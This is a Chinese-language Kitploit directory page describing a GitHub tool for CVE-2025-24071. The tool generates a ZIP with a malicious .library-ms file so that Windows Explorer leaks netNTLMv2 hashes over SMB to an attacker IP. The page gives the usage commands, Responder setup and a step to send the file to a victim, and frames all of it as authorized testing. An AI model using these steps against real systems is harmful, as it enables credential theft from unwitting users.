Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24071 — 生成一个利用CVE-2025-24071的ZIP文件,通过恶意的.library-ms文件从Windows资源管理器中捕获netNTLMv2凭据,用于受控测试。 | Kitploit
工具/GitHubGitHub/rubbxalc/cve-2025-24071
密码破解侦察漏洞分析漏洞利用信息收集学习与教育
GitHubrubbxalc/cve-2025-24071

CVE-2025-24071

生成一个利用CVE-2025-24071的ZIP文件,通过恶意的.library-ms文件从Windows资源管理器中捕获netNTLMv2凭据,用于受控测试。

查看仓库
1111年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24071

此 Python 脚本旨在演示 Windows 资源管理器中的 CVE-2025-24071 漏洞。该漏洞允许攻击者无需受害者直接交互即可捕获受害者的 netNTLMv2 凭据。

描述

CVE-2025-24071 漏洞存在于 Windows 处理 ZIP 压缩包内 .library-ms 文件的方式中。当提取包含恶意 .library-ms 文件的 ZIP 文件时,Windows 会自动尝试访问该文件中指定的 SMB 位置,这可能导致受害者的凭据暴露给攻击者的服务器。

此脚本生成一个包含恶意 .library-ms 文件的 ZIP 文件。当受害者提取该 ZIP 文件时,系统会自动尝试连接到文件中指定的 SMB 位置,无需受害者任何交互即可将 netNTLMv2 凭据发送给攻击者。

工作原理

  1. 脚本将攻击者 IP 地址作为参数,并将其插入到定义 .library-ms 文件的 XML 文件中。该文件指示 Windows 连接到攻击者 IP 地址处的共享资源。

  2. 然后将 .library-ms 文件放入名为 exploit.zip 的 ZIP 文件中。

  3. 当受害者提取 ZIP 文件时,Windows 处理 .library-ms 文件,并由于该漏洞自动建立到攻击者服务器的 SMB 连接。

  4. 攻击者可以使用 Responder 等工具捕获 netNTLMv2 凭据,而受害者无需采取任何行动。

要求

  • Python 3.x
  • 模块:zipfile、os、argparse

使用方法

  1. 生成恶意文件:
root@kitploit:~
python exploit.py --ip <ATTACKER_IP>
  1. 生成恶意文件后,请确保 Responder 正在运行并监听 netNTLMv2 哈希值。
root@kitploit:~
responder -I <INTERFACE>
  1. 将生成的 exploit.zip 文件发送给受害者。当他们提取该文件时,Windows 将尝试连接到 .library-ms 文件中指定的 SMB 服务器。

  2. 一旦受害者提取了 ZIP 文件并且 Windows 尝试进行 SMB 连接,Responder 将从受害者处捕获 netNTLMv2 哈希值。

免责声明

此脚本旨在用于受控环境中的教育和测试目的。恶意利用此漏洞可能违反许多国家的法律法规。请仅在您拥有审计权限的系统上使用此脚本,并始终获得适当授权。

下载工具